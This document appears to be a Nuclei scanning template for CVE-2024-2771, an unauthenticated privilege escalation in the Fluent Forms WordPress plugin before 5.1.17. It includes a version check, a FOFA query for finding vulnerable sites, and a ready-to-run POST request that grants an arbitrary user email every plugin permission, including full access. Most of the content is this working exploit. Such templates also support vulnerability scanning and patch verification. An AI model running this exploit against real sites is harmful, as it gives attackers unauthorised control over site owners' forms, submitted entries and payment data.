The plugin is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.
PoC代码[已公开]
id: CVE-2024-2771
info:
name: Contact Form Plugin by Fluent Forms < 5.1.17 - Unauthenticated Limited Privilege Escalation
author: Sourabh-Sahu
severity: critical
description: |
The plugin is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.
remediation: update to 5.1.17 or later.
reference:
- https://github.com/whale93/CVE-2024-2771-PoC
- https://nvd.nist.gov/vuln/detail/CVE-2024-2771
- https://www.wordfence.com/threat-intel/vulnerabilities/id/071195d6-3452-4241-a8d3-92efc84e4850?source=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-2771
cwe-id: CWE-862
epss-score: 0.24379
epss-percentile: 0.95914
cpe: cpe:2.3:a:fluentforms:contact_form:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
fofa-query: body="/wp-content/plugins/fluentform/"
vendor: fluentforms
product: contact_form
framework: wordpress
tags: cve,cve2024,wordpress,fluentforms,wp-plugin,unauth,wp,vkev
flow: http(1) || http(2)
http:
- raw:
- |
GET /wp-content/plugins/fluentform/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
- compare_versions(version, '< 5.1.17')
condition: and
extractors:
- type: regex
part: body
name: version
group: 1
regex:
- 'Stable tag: ([0-9.]+)'
internal: true
- raw:
- |
POST /wp-json/fluentform/v1/managers HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
{
"manager": {
"email": "{{email}}",
"permissions": [
"fluentform_dashboard_access",
"fluentform_forms_manager",
"fluentform_entries_viewer",
"fluentform_manage_entries",
"fluentform_view_payments",
"fluentform_manage_payments",
"fluentform_settings_manager",
"fluentform_full_access"
]
}
}
#exploit requires an existing user email address to work.
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_all(body, 'Manager has been saved.','{{email}}')"
- "contains(content_type, 'application/json')"
condition: and
# digest: 4a0a004730450220319f020d175719bb9e83dbf191e5a1c4dff678d2111bd1fde975612c8d14479a02210083c26db77693956fd27b40393ac845d29bf5e6018c469ac92f5efc7c2b01abd2:922c64590222798bb761d5b6d8e72950